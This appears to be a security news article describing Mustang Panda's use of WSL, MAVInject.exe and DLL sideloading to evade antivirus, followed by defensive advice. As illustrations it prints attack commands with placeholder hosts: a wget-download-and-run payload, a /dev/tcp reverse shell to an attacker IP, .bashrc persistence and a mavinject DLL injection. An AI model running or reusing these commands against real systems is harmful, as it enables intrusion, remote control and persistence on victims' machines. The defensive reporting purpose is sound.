Mustang Panda Cyber Attack: Chinese Hackers Exploit Microsoft Tool to Bypass Antivirus and Install Backdoors
Share
Mustang Panda cyber attack is making headlines as Chinese hackers leverage the Microsoft Windows Subsystem for Linux (WSL) to bypass antivirus defenses, causing widespread cybersecurity threats. By exploiting this tool, attackers evade detection, install backdoors, and execute malicious payloads with unprecedented stealth. This sophisticated attack, attributed to the notorious Chinese cyber-espionage group Mustang Panda—also tracked as Earth Preta, targets government agencies, think tanks, and NGOs globally, primarily in Asia, Europe, and the United States. This new attack method exposes a critical vulnerability in Microsoft’s security architecture, underscoring the growing complexity of cyber threats.
How this Attack Works
The attack method hinges on exploiting the WSL, a Microsoft feature that allows users to run native Linux binaries on Windows systems. This capability provides a seamless way to execute Linux scripts within the Windows environment without triggering traditional Windows-based antivirus solutions. Here’s how the attack unfolds:
- Initial Access via Spear-Phishing:
-
- The attackers initiate the attack by sending spear-phishing emails containing malicious attachments. These emails are meticulously crafted to appear legitimate, often mimicking trusted contacts or official communications.
- Once the victim opens the attachment or clicks on the embedded link, a malicious script executes, deploying the initial payload.
2. Payload Delivery and Execution:
-
- The payload is designed to run within the WSL environment, bypassing traditional Windows security measures.
- Using tools like wget or curl, the payload downloads additional malware components from remote servers:
wget http://<malicious_url>/payload -O /tmp/payload
chmod +x /tmp/payload
/tmp/payload
2. Compiling and Executing ELF Binaries:
-
- Attackers compile malicious ELF binaries specifically designed for the WSL environment. These binaries are undetectable by traditional Windows antivirus solutions as they are executed within the Linux subsystem.
- An example of a reverse shell code commonly used in such attacks is:
#!/bin/bash
# Reverse shell example for WSL exploitation
bash -i >& /dev/tcp/<Attacker_IP>/<Port> 0>&1
3. Maintaining Persistence:
-
- To maintain long-term access, the attackers modify startup scripts such as .bashrc or .profile, ensuring the payload executes each time the WSL environment is launched:
echo “/tmp/payload” >> ~/.bashrc
4. C2 Communication and Data Exfiltration:
-
- The attackers establish communication with their Command and Control (C2) servers using encrypted channels, allowing them to remotely control the compromised system.
- Tools like nc (netcat) or custom TCP clients facilitate secure data exfiltration and remote command execution.
Advanced Techniques Utilized by Earth Preta
1. Exploitation of MAVInject.exe:
-
- Earth Preta uses MAVInject.exe, the Microsoft Application Virtualization Injector, to inject malware into waitfor.exe, a Windows process used for signaling between networked computers.
- The technique is specifically designed to bypass detection by Eset antivirus, leveraging MAVInject.exe to disguise malicious activity as legitimate system processes.
mavinject.exe /INJECTRUNNING <Process_ID> <Malicious_DLL>
2. Setup Factory Exploitation:
-
- The group exploits Setup Factory, a Windows software installer tool, to drop and execute malicious payloads.
- This approach ensures persistence and stealth by masquerading malicious components as legitimate software installers.
3. Use of IRSetup.exe Dropper:
-
- The attack chain begins with a malicious dropper, IRSetup.exe, which deploys multiple files into the ProgramData/session directory.
- It executes a decoy PDF related to anti-crime initiatives to divert suspicion while the malware establishes system control.
4. Abuse of OriginLegacyCLI.exe:
-
- Earth Preta abuses OriginLegacyCLI.exe, a legitimate Electronic Arts application, to sideload EACore.dll, a modified version of the Toneshell backdoor.
- If Eset processes are detected, regsvr32.exe registers EACore.dll, triggering the execution of waitfor.exe.
- MAVInject.exe then injects malicious code into the running process.
Who Is Behind the Attacks?
The attacks are orchestrated by Mustang Panda, also known as Earth Preta, Bronze President, TA416, and RedDelta. Active since at least 2012, Mustang Panda is a Chinese state-sponsored Advanced Persistent Threat (APT) group known for its strategic cyber-espionage campaigns. They primarily target:
- Government agencies, including diplomatic and defense entities.
- Non-Governmental Organizations (NGOs) with political and human rights advocacy focuses.
- Think tanks and research institutions, particularly those involved in international relations and defense studies.
Their modus operandi involves:
- Social Engineering: Crafting highly convincing spear-phishing emails, often using native language lures and themes relevant to the target’s geopolitical context.
- Code Injection and DLL Sideloading: Utilizing MAVInject.exe and OriginLegacyCLI.exe to execute payloads stealthily.
- Advanced Persistence Mechanisms: Leveraging IRSetup.exe and Setup Factory to maintain control within compromised networks.
Mustang Panda’s activities are closely aligned with Chinese strategic interests, gathering intelligence on political developments, defense initiatives, and diplomatic relations, particularly in Asia, Europe, and the United States.
Defensive Measures Specifically Tailored for Mustang Panda’s Tactics
- WSL-Specific Security Measures:
- Disable WSL Where Unnecessary:
Disable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux
- Monitor WSL Activity: Track .bashrc and .profile modifications and unusual network connections from WSL.
2. Advanced Spear-Phishing Defense:
-
- Conduct regular simulations replicating Mustang Panda’s phishing styles.
- Deploy AI-based email security solutions to detect targeted spear-phishing campaigns.
3. Detection of MAVInject.exe Abuse:
-
- Monitor and restrict execution of MAVInject.exe and OriginLegacyCLI.exe.
- Deploy custom detection rules to identify unusual DLL injections and process behavior.
4. Network Defense and C2 Communication Monitoring:
-
- Implement network segmentation to isolate systems using WSL.
- Monitor DNS queries and network traffic for known C2 patterns associated with Mustang Panda.
5. Incident Response and Threat Hunting:
-
- Proactively hunt for TTPs used by Mustang Panda as outlined in the MITRE ATT&CK framework.
- Develop incident response playbooks tailored to MAVInject.exe and OriginLegacyCLI.exe exploitation.
To Sum Up
The sophisticated tactics used by Earth Preta, including the abuse of MAVInject.exe and OriginLegacyCLI.exe, demonstrate the growing complexity of state-sponsored cyber-espionage campaigns. Organizations must deploy advanced security measures, including WSL-specific monitoring, enhanced spear-phishing defenses, and proactive threat hunting, to defend against these evolving threats.
Collaboration between cybersecurity vendors and continuous intelligence sharing is crucial for countering Mustang Panda’s tactics. By staying informed and vigilant, organizations can safeguard sensitive data and maintain resilience against cyber-espionage campaigns targeting critical infrastructure worldwide.
References
Chinese Hackers Exploit Windows Tool to Install Backdoors
Mustang Panda Leverages Microsoft Tools to Bypass Anti-Virus Solutions – Infosecurity Magazine
Chinese hackers abuse Microsoft tool to get past antivirus and cause havoc | TechRadar
